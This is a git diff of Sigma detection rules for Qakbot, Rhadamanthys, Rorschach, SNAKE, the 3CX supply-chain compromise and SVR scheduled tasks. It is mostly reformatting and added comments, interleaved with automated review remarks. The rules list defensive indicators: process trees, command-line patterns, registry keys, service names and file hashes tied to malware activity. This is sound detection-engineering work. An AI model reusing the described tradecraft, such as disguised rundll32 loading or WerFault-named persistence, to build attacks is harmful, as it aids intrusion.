b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml 
@@ -1,9 +1,7 @@ title: Qakbot Rundll32 Fake DLL Extension Execution id: bfd34392-c591-4009-b938-9fd985a28b85 status: experimental -description: Detects specific process tree behavior of a "rundll32" execution where - the DLL doesn't have the ".dll" extension. This is often linked with potential - Qakbot activity. +description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity. references: - https://github.com/pr0xylife/Qakbot/ author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -20,12 +18,14 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware - :\ProgramData\ - :\Users\Public\ - \AppData\Local\Temp\ - \AppData\Roaming\ ParentProcessName|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware - \cmd.exe - \cscript.exe - \curl.exe @@ -33,9 +33,9 @@ detection: - \powershell.exe - \pwsh.exe - \wscript.exe - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe filter_main_extension: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml index 2447db218..af3fa3ddc 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml 
@@ -1,8 +1,7 @@ title: Qakbot Uninstaller Execution id: bc309b7a-3c29-4937-a4a3-e232473f9168 status: experimental -description: Detects the execution of the Qakbot uninstaller file mentioned in the - USAO-CDCA document on the disruption of the Qakbot malware and botnet +description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet references: - https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources - https://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community @@ -21,13 +20,13 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \QbotUninstall.exe - - Hashes|contains: - - IMPHASH=E772C815072311D6FB8C3390743E6BE5 - - SHA256=423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180 - - SHA256=559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6 - - SHA256=855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071 - - SHA256=FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0 + - NewProcessName|endswith: \QbotUninstall.exe + - Hashes|contains: + - IMPHASH=E772C815072311D6FB8C3390743E6BE5 + - SHA256=423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180 + - SHA256=559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6 + - SHA256=855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071 + - SHA256=FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0 condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml b/sigma/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml index c06ab54df..9bed93d19 100644 
--- a/sigma/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml @@ -1,9 +1,7 @@ title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE id: 5cdbc2e8-86dd-43df-9a1a-200d4745fba5 status: test -description: Detects the use of Rundll32 to launch an NSIS module that serves as the - main stealer capability of Rhadamanthys infostealer, as observed in reports and - samples in early 2023 +description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023 references: - https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 - https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ @@ -24,12 +22,12 @@ detection: EventID: 4688 Channel: Security selection_rundll32: - - OriginalFileName: RUNDLL32.EXE - - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe selection_dll: - CommandLine|contains: nsis_uns + CommandLine|contains: nsis_uns selection_export_function: - CommandLine|contains: PrintUIEntry + CommandLine|contains: PrintUIEntry condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml b/sigma/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml index b5344a5b9..370c7e1e5 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml 
@@ -21,8 +21,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: '11111111' - NewProcessName|endswith: + CommandLine|contains: '11111111' + NewProcessName|endswith: - \bcdedit.exe - \net.exe - \net1.exe diff --git a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml index 268cd7b88..7d35a7cf4 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml @@ -1,8 +1,7 @@ title: Potential SNAKE Malware Installation CLI Arguments Indicator id: 02cbc035-b390-49fe-a9ff-3bb402c826db status: experimental -description: Detects a specific command line arguments sequence seen used by SNAKE - malware during its installation as described by CISA in their report +description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) 
@@ -18,7 +17,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|re: \s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16} + # This CLI regex is based on the following description from the report: + # The jpsetup.exe installer requires two arguments to be passed via the command line for execution + # The first argument is a wide character string hashed with SHA-256 twice -> We assume that the first argument is of length SHA256 + # The AES initialization vector (IV) consists of the first 16 bytes of the second argument to jpsetup.exe -> We assume that the second argument is of at least 16 bytes (16 characters) + CommandLine|re: \s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16} condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml index 5af8cc754..667f4e15a 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml @@ -1,8 +1,7 @@ title: Potential SNAKE Malware Installation Binary Indicator id: d91ff53f-fd0c-419d-a6b8-ae038d5c3733 status: experimental -description: Detects a specific binary name seen used by SNAKE malware during its - installation as described by CISA in their report +description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) 
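Review bot: The second added comment line draws a conclusion the cited report does not support: "hashed with SHA-256 twice" describes what jpsetup.exe does with its first argument, not that the argument is itself a 64-character hex digest, so the `{64}` quantifier is an assumption of the rule author rather than a fact from the report. Mark it as such so a tuner does not treat it as ground truth, e.g. `# Assumption (not stated in the report): the first argument is passed as a 64-character hex string; installs using a differently encoded first argument will not match`. The third line is on firmer ground, since a 16-byte IV taken from the second argument only requires a minimum length, which the right-unanchored `{16}` already allows; whether 16 bytes of a wide-character argument equals 16 or 8 characters is likewise left open, and the comment could hedge that too.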
@@ -18,19 +17,19 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \jpsetup.exe - \jpinst.exe filter_main_cli_name: - CommandLine: + CommandLine: - jpinst.exe - jpinst - jpsetup.exe - jpsetup filter_main_cli_empty: - CommandLine: '' + CommandLine: '' filter_main_cli_null: - CommandLine: null + CommandLine: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml index 5edcbf8e7..a63d4bdaa 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml @@ -1,9 +1,7 @@ title: Potential SNAKE Malware Persistence Service Execution id: f7536642-4a08-4dd9-b6d5-c3286d8975ed status: experimental -description: Detects a specific child/parent process relationship indicative of a - "WerFault" process running from the "WinSxS" as a service. This could be indicative - of potential SNAKE malware activity as reported by CISA. +description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA. references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) 
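Review bot: `filter_main_cli_null` now reads `CommandLine:` with no value, which YAML parses as null but hides the intent; the removed `CommandLine: null` told the reader that this filter matches events where the CommandLine field is absent, in deliberate contrast to `filter_main_cli_empty: CommandLine: ''` directly above it. Keep the explicit `CommandLine: null`, or if the converter strips it, annotate the line with `# null: matches events with no CommandLine field (distinct from the empty-string filter above)`.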
@@ -20,8 +18,8 @@ detection: Channel: Security selection: ParentProcessName|endswith: \services.exe - NewProcessName|startswith: C:\Windows\WinSxS\ - NewProcessName|endswith: \WerFault.exe + NewProcessName|startswith: C:\Windows\WinSxS\ + NewProcessName|endswith: \WerFault.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml index 7ecdc532a..efcdeee56 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml @@ -1,8 +1,7 @@ title: SNAKE Malware Covert Store Registry Key id: d0fa35db-0e92-400e-aa16-d32ae2521618 status: experimental -description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' - which is a key related to SNAKE malware as described by CISA +description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml index 4a09b45da..e8c30e58a 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml 
@@ -1,9 +1,7 @@ title: Potential Encrypted Registry Blob Related To SNAKE Malware id: 7e163e96-b9a5-45d6-b2cd-d7d87b13c60b status: experimental -description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" - key with an uncommon name. This could be related to SNAKE Malware as reported - by CISA +description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) @@ -22,11 +20,10 @@ detection: selection: ObjectName|contains: \SOFTWARE\Classes\.wav\OpenWithProgIds\ filter_main_wav: - - ObjectName|endswith: .AssocFile.WAV - - ObjectName|contains: .wav. + - ObjectName|endswith: .AssocFile.WAV + - ObjectName|contains: .wav. condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - Some additional tuning might be required to tune out legitimate processes that - write to this key by default + - Some additional tuning might be required to tune out legitimate processes that write to this key by default level: medium ruletype: Sigma diff --git a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml index 555982a44..c1217463b 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml 
@@ -1,9 +1,7 @@ title: SNAKE Malware Service Persistence id: b2e60816-96b2-45bd-ba91-b63578c03ef6 status: experimental -description: Detects the creation of a service named "WerFaultSvc" which seems to - be used by the SNAKE malware as a persistence mechanism as described by CISA in - their report +description: Detects the creation of a service named "WerFaultSvc" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) @@ -20,7 +18,7 @@ detection: selection: Provider_Name: Service Control Manager EventID: 7045 - ServiceName|contains: WerFaultSvc + ServiceName|contains: WerFaultSvc # Note: The report contains a "," in the name ("WerFaultSvc,"). Since we can't confirm if its a typo or not we don't use it ImagePath|startswith: C:\Windows\WinSxS\ ImagePath|endswith: \WerFault.exe condition: system and selection diff --git a/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml b/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml index 583551f6b..fe135e832 100644 --- a/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml +++ b/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml 
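Review bot: The inline comment added to `ServiceName|contains: WerFaultSvc` explains why the trailing comma from the report is not used, but with the `contains` modifier the question is moot: `WerFaultSvc,` contains `WerFaultSvc`, so both spellings already match and no coverage is traded away. Reword so the note does not read as a detection gap, e.g. `# Note: The report lists the name as "WerFaultSvc," (trailing comma). We can't confirm whether that is a typo, but "contains" matches either form`.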
@@ -1,20 +1,20 @@ title: Potential Compromised 3CXDesktopApp Execution id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 - type: similar - - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental description: Detects execution of known compromised version of 3CXDesktopApp references: @@ -36,6 +36,7 @@ detection: Channel: Security selection_hashes_1: Hashes|contains: + # 3CX Desktop 18.12.407 - SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC - SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02 - SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE @@ -45,6 +46,7 @@ detection: - MD5=BB915073385DD16A846DFA318AFA3C19 - MD5=08D79E1FFFA244CC0DC61F7D2036ACA9 - MD5=4965EDF659753E3C05D800C6C8A23A7A + # 3CX Desktop 18.12.416 - SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405 - SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734 - SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203 
@@ -54,6 +56,7 @@ detection: - MD5=9833A4779B69B38E3E51F04E395674C6 - MD5=704DB9184700481A56E5100FB56496CE - MD5=8EE6802F085F7A9DF7E0303E65722DC0 + # 3CXDesktopApp MSI - SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868 - SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983 - SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA 
@@ -61,37 +64,37 @@ detection: - MD5=F3D4144860CA10BA60F7EF4D176CC736 - MD5=0EEB1C0133EB4D571178B2D9D14CE3E9 selection_hashes_2: - - sha256: - - DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC - - 54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02 - - D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE - - FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405 - - 5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734 - - A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203 - - AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868 - - 59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983 - - sha1: - - 480DC408EF50BE69EBCF84B95750F7E93A8A1859 - - 3B43A5D8B83C637D00D769660D01333E88F5A187 - - 6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA - - E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1 - - 8433A94AEDB6380AC8D4610AF643FB0E5220C5CB - - 413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5 - - BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA - - BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E - - md5: - - BB915073385DD16A846DFA318AFA3C19 - - 08D79E1FFFA244CC0DC61F7D2036ACA9 - - 4965EDF659753E3C05D800C6C8A23A7A - - 9833A4779B69B38E3E51F04E395674C6 - - 704DB9184700481A56E5100FB56496CE - - 8EE6802F085F7A9DF7E0303E65722DC0 - - F3D4144860CA10BA60F7EF4D176CC736 - - 0EEB1C0133EB4D571178B2D9D14CE3E9 + - sha256: + - DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC + - 54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02 + - D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE + - FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405 + - 5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734 + - A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203 + - AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868 + - 59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983 + - sha1: + - 480DC408EF50BE69EBCF84B95750F7E93A8A1859 + - 
3B43A5D8B83C637D00D769660D01333E88F5A187 + - 6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA + - E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1 + - 8433A94AEDB6380AC8D4610AF643FB0E5220C5CB + - 413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5 + - BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA + - BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E + - md5: + - BB915073385DD16A846DFA318AFA3C19 + - 08D79E1FFFA244CC0DC61F7D2036ACA9 + - 4965EDF659753E3C05D800C6C8A23A7A + - 9833A4779B69B38E3E51F04E395674C6 + - 704DB9184700481A56E5100FB56496CE + - 8EE6802F085F7A9DF7E0303E65722DC0 + - F3D4144860CA10BA60F7EF4D176CC736 + - 0EEB1C0133EB4D571178B2D9D14CE3E9 selection_pe_1: - - OriginalFileName: 3CXDesktopApp.exe - - NewProcessName|endswith: \3CXDesktopApp.exe - - Product: 3CX Desktop App + - OriginalFileName: 3CXDesktopApp.exe + - NewProcessName|endswith: \3CXDesktopApp.exe + - Product: 3CX Desktop App selection_pe_2: FileVersion|contains: 18.12. condition: process_creation and (all of selection_pe_* or 1 of selection_hashes_*) diff --git a/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml b/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml index 5d5c4e811..6d08d787c 100644 --- a/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml +++ b/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml 
@@ -1,23 +1,22 @@ title: Potential Suspicious Child Process Of 3CXDesktopApp id: 63f3605b-979f-48c2-b7cc-7f90523fed88 related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c - type: similar - - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental -description: Detects potential suspicious child processes of "3CXDesktopApp.exe". - Which could be related to the 3CXDesktopApp supply chain compromise +description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise references: - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ - https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ @@ -37,7 +36,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \3CXDesktopApp.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \cscript.exe - \mshta.exe 
diff --git a/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml b/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml index f58214a16..2c79aa6a2 100644 --- a/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml +++ b/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml 
@@ -1,23 +1,22 @@ title: Potential Compromised 3CXDesktopApp Update Activity id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c - type: similar - - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental -description: Detects the 3CXDesktopApp updater downloading a known compromised version - of the 3CXDesktopApp software +description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software references: - https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/ - https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats @@ -36,11 +35,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - --update - http - /electron/update/win32/18.12 - NewProcessName|endswith: \3CXDesktopApp\app\update.exe + NewProcessName|endswith: \3CXDesktopApp\app\update.exe condition: process_creation and selection falsepositives: - Unknown 
diff --git a/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml b/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml index 5f606126a..3ca90b2c4 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml @@ -1,8 +1,8 @@ title: Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor id: 8fa65166-f463-4fd2-ad4f-1436133c52e1 related: - - id: 2bfc1373-0220-4fbd-8b10-33ddafd2a142 - type: similar + - id: 2bfc1373-0220-4fbd-8b10-33ddafd2a142 + type: similar status: experimental description: Hunts for known SVR-specific scheduled task names author: CISA diff --git a/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml b/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml index 9cb590c3b..1ed268e58 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml @@ -1,8 +1,8 @@ title: Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler id: 2bfc1373-0220-4fbd-8b10-33ddafd2a142 related: - - id: 8fa65166-f463-4fd2-ad4f-1436133c52e1 - type: similar + - id: 8fa65166-f463-4fd2-ad4f-1436133c52e1 # Security-Audting Eventlog + type: similar status: experimental description: Hunts for known SVR-specific scheduled task names author: CISA 
